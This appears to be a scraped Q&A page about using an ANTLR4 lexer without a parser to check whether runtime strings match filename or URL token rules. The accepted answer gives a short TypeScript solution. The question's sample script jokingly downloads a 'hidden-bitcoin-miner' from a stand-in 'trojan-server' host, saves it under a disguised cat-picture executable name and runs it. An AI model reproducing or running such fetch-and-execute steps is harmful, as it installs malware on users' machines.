Is there a good way using ANTLR4 to check for specific tokens without parsing?

Question

I have an ANTLR4 grammar that contains tokens for "filenames" and "URLs" but the language also includes strings and string expressions (which might turn out to be filenames or URLs). Is there a good way to call just the tokenizer on some string in my interpreter and see if the string is a filename or URL according to my token rules? I just want to special case those cases where the script I am interpreting has created one of those things on the fly, so I can treat such strings specially.

lexer  // this I already have (or something like this)
FileName: ([A-Za-z]':')?('\'?[-_.A-Za-z0-9]+)+ ;
URL: ([A-Za-z]+':')?'/'?('/'?[-_.A-Za-z0-9]+)+ ;

Intepreter.java

public boolean isFileName(String string) {
   return antlr.lexer.token(string).type == FileName;  // this is the magic I want
}

Script  // this is what I am looking to understand
  # you get cat pictures, I get paid...
  url = 'https://trojan-server.com/hidden-bitcoin-miner';
  fn = 'c:' + programdirectory() + 'show-cat-pictures.exe';
  download(url, fn);
  exec(fn);

Michael Toy · Accepted Answer

As I understand the question, you would like your interpreter actions which receives strings which are constructed at runtime, to be able to take advantage of your lexer to determine if those strings are URL or file references.

Something like this:

doDownloadAction(source: string, dest: string) {
  if (isFilename(source)) {

One answer would be to just fire up a new lexer fed by your string, the same way you do when you start a parse, but with no parser ... Something like this (in Typescript, sorry it's what I use for ANTLR):

import {LMLexer} from "./LMLexer";
import {CharStreams} from "antlr4ts";

function isFilename(txt: string) {
  const stringLexer = new LMLexer(CharStreams.fromString(txt));
  return stringLexer.nextToken().type == LMLexer.FileName;
}

for ( const str of [ "C:\Users\Tony\file.txt", "http://stackoverflow.com" ]) {
  console.log(str, isFilename(str) ? "is" : "is not", "a filename");
}

Is there a good way using ANTLR4 to check for specific tokens without parsing?

Tags:

java

token

antlr4

intel_chris

1 Answers

Michael Toy

Recent Activity

Donate For Us

Is there a good way using ANTLR4 to check for specific tokens without parsing?

Tags:

java

token

antlr4

intel_chris

1 Answers

Michael Toy

Related questions

Recent Activity

Donate For Us